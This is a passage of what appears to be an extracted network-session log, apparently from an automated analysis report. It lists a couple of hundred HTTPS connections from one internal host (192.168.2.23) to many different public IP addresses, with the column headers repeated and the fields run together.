                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          23294192.168.2.2359568218.27.244.195443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          23295192.168.2.2348072133.66.186.62443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          23296192.168.2.234331872.121.72.229443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          23297192.168.2.2345606151.85.131.93443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          23298192.168.2.235996043.52.179.205443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          23299192.168.2.233965662.157.157.55443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          23300192.168.2.2335724121.189.138.180443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          23301192.168.2.2357512165.65.128.181443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          23302192.168.2.2354886191.151.179.210443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          23303192.168.2.234444631.58.27.113443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          23304192.168.2.2360562110.1.83.240443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          23305192.168.2.2356948193.126.233.144443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          23306192.168.2.235450885.64.123.101443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          23307192.168.2.233957892.30.150.62443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          23308192.168.2.234386099.150.154.74443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          23309192.168.2.2354112175.47.66.146443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          23310192.168.2.235520454.172.119.25443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          23311192.168.2.23587828.165.142.195443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          23312192.168.2.2359176145.105.234.180443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          23313192.168.2.2339730102.209.105.54443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          23314192.168.2.2342188189.170.169.87443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          23315192.168.2.2352424138.65.51.255443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          23316192.168.2.2359998161.250.93.93443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          23317192.168.2.2352284193.60.33.207443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          23318192.168.2.2343654151.143.88.224443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          23319192.168.2.2349096158.158.104.84443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          23320192.168.2.2335450178.164.179.53443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          23321192.168.2.23412182.146.118.252443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          23322192.168.2.2347224186.201.94.175443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          23323192.168.2.2349492167.174.222.216443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          23324192.168.2.2350012169.5.205.232443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          23325192.168.2.235373676.225.89.242443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          23326192.168.2.235849027.151.220.109443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          23327192.168.2.235808246.125.126.151443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          23328192.168.2.23421184.44.214.234443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          23329192.168.2.2359072144.182.54.255443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          23330192.168.2.2344368103.71.232.32443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          23331192.168.2.235170660.185.169.216443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          23332192.168.2.235240457.0.217.238443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          23333192.168.2.2356554101.26.41.225443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          23334192.168.2.2338754204.75.155.14443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          23335192.168.2.235084681.212.237.50443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          23336192.168.2.2336280212.10.199.63443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          23337192.168.2.2356732120.38.196.143443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          23338192.168.2.2346626202.199.131.38443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          23339192.168.2.235024238.78.140.75443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          23340192.168.2.235657692.48.183.45443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          23341192.168.2.2334688151.248.0.155443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          23342192.168.2.234009050.218.211.138443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          23343192.168.2.2354782128.33.34.7443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          23344192.168.2.2346646158.227.166.172443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          23345192.168.2.2345104106.255.54.207443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          23346192.168.2.2358628210.23.140.47443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          23347192.168.2.2335218187.194.101.199443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          23348192.168.2.2351978171.133.60.20443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          23349192.168.2.235675887.196.127.144443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          23350192.168.2.233658257.84.218.45443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          23351192.168.2.2333086133.199.193.182443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          23352192.168.2.2337022135.215.89.211443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          23353192.168.2.2352700124.81.138.67443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          23354192.168.2.234138040.61.224.137443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          23355192.168.2.235435460.240.94.4443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          23356192.168.2.2343218117.208.145.166443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          23357192.168.2.2359506164.99.177.235443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          23358192.168.2.2360524206.107.3.179443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          23359192.168.2.2336264103.12.219.38443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          23360192.168.2.233565691.222.209.221443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          23361192.168.2.2333236135.251.35.218443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          23362192.168.2.234293414.135.151.216443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          23363192.168.2.233411695.246.93.18443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          23364192.168.2.2346656155.13.94.192443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          23365192.168.2.2336556116.121.69.212443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          23366192.168.2.235529459.219.136.128443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          23367192.168.2.2353668217.196.211.234443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          23368192.168.2.235896427.111.77.167443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          23369192.168.2.235144857.133.149.101443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          23370192.168.2.2349758136.66.20.95443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          23371192.168.2.2353342149.97.139.213443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          23372192.168.2.234184644.87.203.233443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          23373192.168.2.2341084157.70.50.192443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          23374192.168.2.234396469.162.211.232443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          23375192.168.2.2343812149.26.34.44443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          23376192.168.2.2357994205.69.127.94443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          23377192.168.2.235779658.242.34.105443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          23378192.168.2.2346424113.220.157.17443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          23379192.168.2.2347006147.69.90.184443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          23380192.168.2.234342853.85.234.194443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          23381192.168.2.235603643.146.126.165443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          23382192.168.2.233473497.41.214.170443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          23383192.168.2.2349562124.143.237.132443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          23384192.168.2.2347196201.255.144.40443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          23385192.168.2.23416204.85.112.223443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          23386192.168.2.2352100117.250.138.97443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          23387192.168.2.2357488142.164.25.192443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          23388192.168.2.2332972138.25.108.37443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          23389192.168.2.233556652.175.219.42443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          23390192.168.2.2355392153.252.192.211443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          23391192.168.2.2353672142.65.164.157443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          23392192.168.2.2350722158.168.243.247443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          23393192.168.2.2360102208.106.255.173443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          23394192.168.2.2347636186.71.253.249443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          23395192.168.2.2340918117.14.54.250443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          23396192.168.2.2346360198.217.101.211443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          23397192.168.2.2356254171.54.194.8443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          23398192.168.2.2344480131.97.1.146443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          23399192.168.2.234269842.46.246.78443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          23400192.168.2.233527237.177.247.248443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          23401192.168.2.2339156208.110.252.191443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          23402192.168.2.2339326153.40.98.214443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          23403192.168.2.2354412216.137.160.32443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          23404192.168.2.2353454201.141.173.211443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          23405192.168.2.234275044.209.163.62443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          23406192.168.2.2354170186.126.247.79443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          23407192.168.2.233566876.177.26.5443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          23408192.168.2.235722636.254.12.42443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          23409192.168.2.234730427.146.44.108443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          23410192.168.2.2338766218.75.81.246443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          23411192.168.2.2346516126.73.57.173443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          23412192.168.2.2333186160.29.249.2443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          23413192.168.2.234651037.105.83.239443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          23414192.168.2.2338152177.28.99.20443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          23415192.168.2.2356852181.89.160.192443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          23416192.168.2.2342392175.2.228.152443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          23417192.168.2.2339996206.95.25.172443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          23418192.168.2.2341940104.188.60.18443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          23419192.168.2.234621495.222.154.178443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          23420192.168.2.2355220186.166.183.4443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          23421192.168.2.234619225.204.3.126443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          23422192.168.2.235496258.156.86.218443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          23423192.168.2.234198657.225.43.113443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          23424192.168.2.2342024166.240.178.118443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          23425192.168.2.234831098.188.96.153443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          23426192.168.2.2335084147.250.163.250443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          23427192.168.2.235144865.92.32.215443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          23428192.168.2.235314069.17.126.176443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          23429192.168.2.23368068.191.64.217443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          23430192.168.2.234308697.205.32.158443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          23431192.168.2.2356258114.66.75.177443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          23432192.168.2.2354276196.191.54.226443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          23433192.168.2.2334510154.179.155.172443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          23434192.168.2.2334980185.135.244.63443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          23435192.168.2.234715896.212.42.19443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          23436192.168.2.2343810155.118.36.190443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          23437192.168.2.2334270148.138.133.68443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          23438192.168.2.233591661.161.142.121443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          23439192.168.2.2350186165.36.181.106443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          23440192.168.2.2340424159.140.111.121443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          23441192.168.2.235686067.226.113.140443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          23442192.168.2.234762469.90.163.43443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          23443192.168.2.233840434.176.126.165443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          23444192.168.2.23395765.136.112.211443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          23445192.168.2.234514825.144.244.148443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          23446192.168.2.2342992202.204.248.147443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          23447192.168.2.233407876.214.178.248443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          23448192.168.2.235225640.8.131.152443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          23449192.168.2.233502845.98.247.195443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          23450192.168.2.2344100185.203.94.23443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          23451192.168.2.235826077.78.8.210443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          23452192.168.2.2338682155.169.169.186443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          23453192.168.2.234733638.77.169.40443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          23454192.168.2.2341424195.126.6.84443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          23455192.168.2.23428281.238.21.50443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          23456192.168.2.2347296192.35.236.174443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          23457192.168.2.235112098.218.59.75443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          23458192.168.2.234735289.152.231.46443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          23459192.168.2.2342104219.42.219.130443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          23460192.168.2.2358812207.197.107.247443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          23461192.168.2.2341774134.84.107.164443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          23462192.168.2.2356752140.115.15.55443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          23463192.168.2.2354526154.182.127.158443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          23464192.168.2.234504874.91.14.77443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          23465192.168.2.2356900177.10.89.31443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          23466192.168.2.2345648197.107.21.233443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          23467192.168.2.2340522157.133.95.179443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          23468192.168.2.2356086100.49.240.208443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          23469192.168.2.2350522133.120.42.131443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          23470192.168.2.2333832102.15.90.238443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          23471192.168.2.2351932197.148.77.108443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          23472192.168.2.2339322163.155.17.136443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          23473192.168.2.23586765.197.86.34443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          23474192.168.2.233501418.147.208.204443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          23475192.168.2.234779438.196.165.241443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          23476192.168.2.2339362205.47.224.32443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          23477192.168.2.2338922111.102.161.23443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          23478192.168.2.235192471.122.252.68443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          23479192.168.2.2357420186.125.35.36443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          23480192.168.2.2333222174.170.123.140443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          23481192.168.2.235064452.143.29.167443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          23482192.168.2.2332968119.4.218.196443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          23483192.168.2.2335778102.93.126.249443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          23484192.168.2.2336552156.156.82.238443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          23485192.168.2.233913820.54.238.112443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          23486192.168.2.2353230179.90.56.101443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          23487192.168.2.235365665.86.218.202443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          23488192.168.2.235115287.126.122.94443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          23489192.168.2.2335140216.138.121.207443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          23490192.168.2.235402034.103.40.230443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          23491192.168.2.235287266.230.68.40443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          23492192.168.2.234235236.67.183.26443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          23493192.168.2.2357210188.23.183.255443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          23494192.168.2.2352258172.228.102.209443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          23495192.168.2.2356000189.208.181.146443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          23496192.168.2.235966413.77.144.124443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          23497192.168.2.2339976198.193.53.213443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          23498192.168.2.233408286.61.148.122443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          23499192.168.2.2333194206.255.137.166443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          23500192.168.2.235706083.22.82.122443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          23501192.168.2.236017697.120.198.224443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          23502192.168.2.233791691.10.1.51443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          23503192.168.2.235218852.252.168.192443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          23504192.168.2.2355898168.111.50.209443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          23505192.168.2.2347400165.13.126.66443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          23506192.168.2.2355704199.115.63.217443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          23507192.168.2.233824878.148.98.26443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          23508192.168.2.2357502176.77.109.231443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          23509192.168.2.2349698206.222.62.216443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          23510192.168.2.2342028140.148.84.56443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          23511192.168.2.2341482155.36.117.96443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          23512192.168.2.2351238120.237.104.52443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          23513192.168.2.2360894104.7.108.76443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          23514192.168.2.2345334121.82.174.32443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
